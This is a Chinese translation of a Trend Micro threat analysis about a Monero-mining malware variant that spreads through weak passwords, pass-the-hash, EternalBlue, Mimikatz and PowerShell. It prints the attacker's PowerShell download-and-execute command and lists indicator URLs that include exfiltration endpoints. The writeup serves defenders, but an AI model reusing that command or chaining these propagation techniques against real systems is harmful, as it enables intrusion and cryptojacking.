影响国人的挖矿恶意软件新变种已蔓延海外

Change Web安全 2019年4月17日发布
Favorite收藏

导语:趋势科技曾在2019年初在中国的大陆、台湾和香港地区发现了一类新的门罗币挖矿恶意软件变种,此恶意软件通过多种传播感染方法在系统和服务器中大肆植入加密货币挖矿机。

趋势科技曾在2019年初在中国的大陆、台湾和香港地区发现了一类新的门罗币挖矿恶意软件变种,此恶意软件通过多种传播感染方法在系统和服务器中大肆植入加密货币挖矿机。在我们之前观测的样本中,其感染方式包括弱密码测试,以及使用哈希传递技术、Windows管理工具,和公开可用代码进行暴力攻击。然而近期,我们在日本发现了此恶意软件的新变种,攻击者在其中通过利用“永恒之蓝”漏洞和PowerShell脚本来侵入系统并逃避检测。

同时,我们的遥测技术显示,现今除了台湾和香港之外,在澳大利亚、越南、印度等地也出现了这类威胁,由此来看,攻击者正将僵尸网络扩散到其他国家和地区。

传播与行为

此恶意软件(由趋势科技检测为Trojan.PS1.LUDICROUZ.A)的主要传播技术是在受感染的机器上,根据弱密码列表来尝试登录网络中连接的其他计算机。恶意软件并非直接将远程命令发送到所连接的系统中去,而是先更改受感染计算机的防火墙和端口转发设置,并设置一个计划任务来下载和执行更新后的恶意软件副本。下载好的副本是个PowerShell脚本,由下列命令执行:

IEX (New-Object Net.WebClient).downloadstring(‘hxxp://v.beahh[.]com/wm?hp’)

t1.jpg

表1.弱密码列表。

恶意软件利用此表以及Invoke-WMIMethod(由趋势科技检测为HackTool.Win32.Impacket.AI)来远程访问其他计算机:

1.png

图1.Invoke-WMIMethod,用于远程访问设置的是弱密码的计算机。

恶意软件还使用哈希传递方法,通过用户的哈希密码向远程服务器验证自己身份。这种方法的步骤是,恶意软件首先通过使用Get-PassHashes命令获取存储在计算机中的哈希值,同时还有上面列出的弱密码列表的哈希值;获取哈希值后,恶意软件使用invok – smbclient(另一个公开可用的脚本)通过哈希传递来执行文件共享操作。

2.png

2-1.png

图2.使用哈希传递技术获取用户密码哈希值和弱密码哈希值。

如果成功,它将删除文件%Start Menu%\ Programs \ Startup \ run.bat,此文件可能是植入的旧版本恶意软件文件,它还删除以下内容:

· %Application Data%\ flashplayer.tmp

· %Application Data%\ sign.txt  – 用于指示计算机已被感染

· %Start Menu%\Programs\Startup\FlashPlayer.lnk – 负责在启动时执行tmp脚本

如果用户使用的是强密码,则恶意软件利用“永恒之蓝”进行传播。

3.png

图3.漏洞利用的相关有效负载。

通过上述方法感染计算机后,恶意软件将获取MAC地址并收集有关计算机中安装的防病毒产品的信息。它从C&C服务器下载另一个混淆的PowerShell脚本(趋势科技检测为Trojan.PS1.PCASTLE.B),并将获取的信息发回。下载的PowerShell是一个dropper,负责下载和执行恶意软件的组件,其中大部分是自身的副本。

4.png

图4.获取MAC地址和AV产品的例行程序。

恶意软件为了检查是否已经安装其组件,会寻找以下文件:

· %Temp%\kkk1.log

· %Temp%\pp2.log

· %Temp%\333.log

· %Temp%\kk4.log

· %Temp%\kk5.log

5.png

图5.检查是否已安装的恶意软件组件。

每个$ flagX代表一个组件。上述的PowerShell dropper脚本就是第一个组件$ flag,恶意软件通过安装一个计划任务来定期运行此脚本并检查更新。恶意软件的行为则取决于此脚本运行时的权限。第二个组件$ flag2可以从不同的URL地址处下载恶意软件的副本,并创建一个不同名称的调度任务。

6-1.png

6-2.png

图6.组件$ flag和$ flag2。

第三个组件(由趋势科技检测为TrojanSpy.Win32.BEAHNY.THCACAI)是一个植入的木马程序——一份更大文件尺寸的自身副本,可能会逃避沙箱检测,并从主机收集系统信息,包括:

· 电脑名称

· 机器的GUID

· MAC地址

· 操作系统版本

· 图像内存信息

· 系统时间

第四个组件是Python编译的二进制可执行文件,它能进一步传播恶意软件,还能够通过植入和执行Mimikatz的PowerShell实现(由趋势科技检测为Trojan.PS1.MIMIKATZ.ADW)来传递哈希攻击。

7.png

图7.植入的第四个可执行组件。

8-1.png

8-2.png

图8.检查是否已经安装了Mimikatz组件,并执行Mimikatz。

恶意软件还会试图使用弱SQL密码来访问数据库服务器,访问时使用的是xp_cmdshell来执行shell命令。与主文件一样,该组件通过重用与先前漏洞利用相关的公共可用代码,扫描可通过“永恒之蓝”利用的易受攻击设备的IP块。

9.png

图9.扫描易受攻击的数据库服务器。

第五个组件是一个可执行文件,可下载并执行。然而,在撰写本文时下载的URL处于脱机状态。

恶意软件的有效负载——门罗币挖矿机——也由PowerShell部署,但不是存储在文件中,而是被注入到自己的PowerShell进程中,并使用另一个公开可用的代码Invoke-ReflectivePEInjection。安装完成后,恶意软件会向C&C服务器报告其状态。

10.png

图10.下载并执行挖矿机有效负载的PowerShell脚本。

11.png

图11.执行挖矿机的有效负载。

结论

恶意软件的设计非常复杂。它利用计算机系统和数据库中的弱密码,针对公司可能仍在使用的遗留软件,使用基于PowerShell的脚本,在内存中下载和执行组件;并利用未修补的漏洞,以及使用Windows启动文件夹和任务调度程序进行安装。考虑到PowerShel及开源代码的日益普及,我们预计会在不远的将来看到更多更复杂的恶意软件。虽然与直接窃取个人身份信息相比,收集系统信息并发送回C&C可能看起来微不足道,但系统信息对于每台机器来说是独一无二的,可用于跟踪,识别和跟踪用户和活动。

12.png

图12.恶意软件新的URL地址。

我们建议用户尽快使用来自合法供应商的可用补丁更新系统。安装旧版本软件的用户还应该使用可靠来源的虚拟补丁进行更新。我们在撰写本文时,恶意软件仍处于活动状态,并已更新URL地址。同时,建议用户最好能使用复杂点的密码,并尽可能授权分层身份验证。对企业来说,应启用一个多层保护系统,能有效阻止此类威胁。

IoC

t2.jpg

URLs

hxxp://down[.]beahh[.]com/c32.dat
hxxp://down[.]beahh[.]com/new.dat?allv5
hxxp://ii[.]ackng[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://log[.]beahh[.]com/logging.php?ver=5p?src=wm&target
hxxp://oo[.]beahh[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://p[.]beahh[.]com/upgrade.php
hxxp://pp[.]abbny[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://v[.]beahh[.]com/wm?hp
hxxp://v[.]y6h[.]net/g?h
hxxp://v[.]y6h[.]net/g?l
lplp1[.]abbny[.]com:443
lplp1[.]ackng[.]com:443
lplp1[.]beahh[.]com:443
本文翻译自:https://blog.trendmicro.com/trendlabs-security-intelligence/miner-malware-spreads-beyond-china-uses-multiple-propagation-methods-including-eternalblue-powershell-abuse/如若转载,请注明原文地址: https://www.4hou.com/web/17443.html
点赞 0
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论